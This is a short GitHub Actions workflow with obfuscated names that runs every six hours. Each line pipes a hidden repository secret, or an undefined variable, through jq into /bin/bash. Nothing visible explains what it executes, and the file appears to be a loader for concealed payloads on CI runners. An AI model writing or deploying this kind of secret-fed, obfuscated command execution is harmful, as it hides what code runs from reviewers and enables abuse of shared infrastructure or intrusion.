name: chenglidai8018

on:
  workflow_dispatch:
  schedule:
    - cron: '6 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: chenglidai8018
        env:
          rwkn61: ${{ secrets.rwkn61 }}
        run: |
          echo $rwkn61 | jq -r .vk096 | /bin/bash
          echo $o401 | jq -r .zfqct3 | /bin/bash
          echo $t9 | jq -r .ulnq3873 | /bin/bash
          echo $ycboi6 | jq -r .q135 | /bin/bash
          echo $ynru98174 | jq -r .rr79842 | /bin/bash

